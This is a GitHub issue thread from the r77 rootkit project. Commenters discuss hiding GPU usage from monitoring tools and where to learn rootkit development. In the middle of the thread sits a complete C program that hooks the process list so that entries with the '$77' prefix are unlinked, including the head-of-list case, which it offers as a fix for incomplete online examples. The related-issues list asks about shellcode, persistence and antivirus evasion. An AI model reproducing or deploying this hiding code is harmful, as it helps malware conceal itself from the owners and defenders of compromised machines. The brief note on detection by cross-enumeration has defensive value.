Comments (6)
Thanks @uakbr :) In terms of learning, I can recommend "The Rootkit Arsenal"; it's a good book on rootkits that also provides some hands-on examples. There's also a lot of stuff online; however, a lot of code posted online is not entirely correct, or it may just be outdated. For example, the NSI_PARAM struct for the TCPView hiding was mostly documented incorrectly, so I had to reverse engineer it myself in order to figure out that struct and what each field means.
In this particular issue you posted in, @echotxl suggested a feature to hide GPU usage. However, it's a long process to figure out what particular API calls are responsible and then filter them correctly. So, expect that any new feature will require a lot of work. The only features that were quickly implemented were file & process hiding, because those are already well documented.
from r77-rootkit.
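The "filter them correctly" step mentioned above, for the one case the comment calls well documented (process hiding), as an added example that is not r77's code: a user-mode hook that calls the real NtQuerySystemInformation(SystemProcessInformation) and then unlinks every entry whose image name carries the hide prefix before returning the buffer. The entry layout below is an assumption made for portability (a trimmed stand-in for SYSTEM_PROCESS_INFORMATION, with a plain char name instead of a UNICODE_STRING); the chaining through NextEntryOffset, which is all the filter depends on, is the real mechanism. The process names and the buffer are constructed sample data; the "$77" prefix is the convention the related issues refer to.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ASSUMPTION: trimmed stand-in for SYSTEM_PROCESS_INFORMATION. The real
 * structure has many more fields; only the NextEntryOffset chain matters here. */
typedef struct {
    uint32_t NextEntryOffset;   /* bytes to the next entry, 0 = last entry */
    uint32_t UniqueProcessId;
    char     ImageFileName[32]; /* real one is a UNICODE_STRING */
} proc_entry_t;

/* Constructed sample buffer: entries back to back with varying padding, so
 * NextEntryOffset is not simply sizeof(proc_entry_t) (real entries are
 * variable-length because a thread array follows each one). */
uint8_t *build_sample(const char *const names[], size_t n, size_t *out_len)
{
    size_t total = 0, pos = 0;
    for (size_t i = 0; i < n; i++) total += sizeof(proc_entry_t) + 8 * (i % 3);
    uint8_t *buf = calloc(1, total);
    if (!buf) return NULL;
    for (size_t i = 0; i < n; i++) {
        proc_entry_t *e = (proc_entry_t *)(buf + pos);
        size_t size = sizeof(proc_entry_t) + 8 * (i % 3);
        e->NextEntryOffset = (i + 1 < n) ? (uint32_t)size : 0;
        e->UniqueProcessId = (uint32_t)(4 * (i + 1));
        strncpy(e->ImageFileName, names[i], sizeof(e->ImageFileName) - 1);
        pos += size;
    }
    *out_len = total;
    return buf;
}

/* Unlink every entry whose name starts with `prefix`. `len` is the byte count
 * the original call returned. Handles the three positions that are easy to
 * get wrong: head (no predecessor), middle, and tail (chain must end, not run
 * past the buffer). Returns the number of entries hidden. */
size_t hide_by_prefix(uint8_t *buf, size_t len, const char *prefix)
{
    size_t plen = strlen(prefix), hidden = 0;
    proc_entry_t *prev = NULL, *cur = (proc_entry_t *)buf;
    for (;;) {
        if (strncmp(cur->ImageFileName, prefix, plen) != 0) {   /* visible */
            if (cur->NextEntryOffset == 0) break;
            prev = cur;
            cur = (proc_entry_t *)((uint8_t *)cur + cur->NextEntryOffset);
            continue;
        }
        if (prev) {                                   /* middle or tail entry */
            hidden++;
            if (cur->NextEntryOffset == 0) { prev->NextEntryOffset = 0; break; }
            prev->NextEntryOffset += cur->NextEntryOffset;   /* skip over cur */
            cur = (proc_entry_t *)((uint8_t *)cur + cur->NextEntryOffset);
        } else {                                      /* head entry */
            if (cur->NextEntryOffset == 0) break;     /* sole entry: cannot empty the list */
            hidden++;
            size_t skip = cur->NextEntryOffset;       /* shift the rest down over it;   */
            memmove(buf, buf + skip, len - skip);     /* relative offsets stay valid    */
            len -= skip;                              /* cur now holds the old successor */
        }
    }
    return hidden;
}

/* Walk the chain the way a consumer such as Task Manager does. Returns count. */
size_t walk_visible(const uint8_t *buf, const char *names[], size_t max)
{
    size_t n = 0;
    const proc_entry_t *cur = (const proc_entry_t *)buf;
    for (;;) {
        if (n < max) names[n] = cur->ImageFileName;
        n++;
        if (cur->NextEntryOffset == 0) break;
        cur = (const proc_entry_t *)((const uint8_t *)cur + cur->NextEntryOffset);
    }
    return n;
}

/* Run one scenario; returns 1 if the visible chain equals `expect`. */
int scenario_matches(const char *const procs[], size_t n, const char *prefix,
                     const char *const expect[], size_t nexpect, size_t *hidden_out)
{
    size_t len, hidden;
    uint8_t *buf = build_sample(procs, n, &len);
    if (!buf) return 0;
    hidden = hide_by_prefix(buf, len, prefix);
    const char *vis[16];
    size_t nv = walk_visible(buf, vis, 16);
    int ok = (nv == nexpect);
    for (size_t i = 0; ok && i < nv; i++) ok = strcmp(vis[i], expect[i]) == 0;
    if (hidden_out) *hidden_out = hidden;
    free(buf);
    return ok;
}

int main(void)
{
    /* constructed sample: hidden entries at head, middle and tail */
    const char *const procs[] = { "$77head.exe", "System", "$77svc.exe",
                                  "explorer.exe", "cmd.exe", "$77tail.exe" };
    const char *const expect[] = { "System", "explorer.exe", "cmd.exe" };
    size_t hidden = 0;
    int ok = scenario_matches(procs, 6, "$77", expect, 3, &hidden);
    printf("hidden=%zu visible-chain-ok=%d\n", hidden, ok);
    return ok ? 0 : 1;
}
```

The head case is the one most online snippets skip: with no predecessor there is nothing whose NextEntryOffset can be bumped, so the remainder of the buffer has to be moved down, which is only safe because the hook knows the returned length. A detector does not need to reverse any of this; it just enumerates processes through a second path (for example, opening PIDs directly) and diffs against the walked chain.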
@bytecode77 No issues. But wow, you are an insane programmer. It seems Google is trying to hide all of the good backdoors/rootkits on the internet, as I only found this one when trying to get PEUnion (got curious and went to your site).
This is highly beneficial though, as when searched, barely anything comes up about r77 rootkit.
Again. Insane programmer. I wish you luck on your future projects
PS: God it is going to be annoying for me to figure out how to make this work over network lol.
from r77-rootkit.
@KRAFMA you should open another issue instead of posting into an unrelated one. Imagine that several topics are being discussed in one thread.
For a moment I was hoping that somebody figured out how to hide GPU utilization, because honestly, I haven't. But in case anyone has, please feel free to create a pull request or send me a PoC, etc. Because this would be a nice feature to have.
from r77-rootkit.
In Version 1.5.1 GPU usage is hidden
I know that this issue was created 2.5 years ago. I, too, had this task on my ToDo list, but I couldn't figure it out. Something that simple may well require weeks of reverse engineering.
Now I have finally figured out what APIs are responsible for providing GPU usage performance counters. Although the creator of this issue may no longer care, this feature is useful and finally implemented.
from r77-rootkit.
Just wanted to let you know, since I haven't yet responded for a long time...
I consider this feature to be useful and I've already analyzed what APIs to hook in order to manipulate the GPU statistics. For now, it's on the ToDo list, as I think this feature is a useful addition. However, I'm currently working on the next version of PEunion and at the moment I only fix bugs in r77 until I have more time to work on features again.
from r77-rootkit.
Hi, would you be able to point me in the right direction in terms of learning material to perhaps help out with such a feature? I am fascinated by your work, and I would like to help in this area. Any books, blogs, or academia you could guide me towards would be lovely.
Thanks!
from r77-rootkit.
Related Issues (20)
- $77 How can a non-interactive SYSTEM permission process use ShellExecuteW so that its child processes can be interactive
- How to start executable files hidden by r77 rootkit?
- Removal tool
- resources
- How to exclude specific processes from installation?
- How to use shellcode?
- how to change prefix $77 to my own keyword
- Teaching lessons
- Contact information
- "MSB3073" Error
- r77 rootkit injects into PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON process
- Adding a .exe to startup
- Help
- ControlPipe using Powershell
- Help Needed - Happy to pay consulting fees
- Help
- testconsole won't work
- Hiding users (net.exe and lusrmgr.msc)
- I discovered new rootkit vulnerability stronger than your rootkit with 0 coding (no admin required)
- Issue with BitDefender Partial Detection of r77 and Loss of Persistence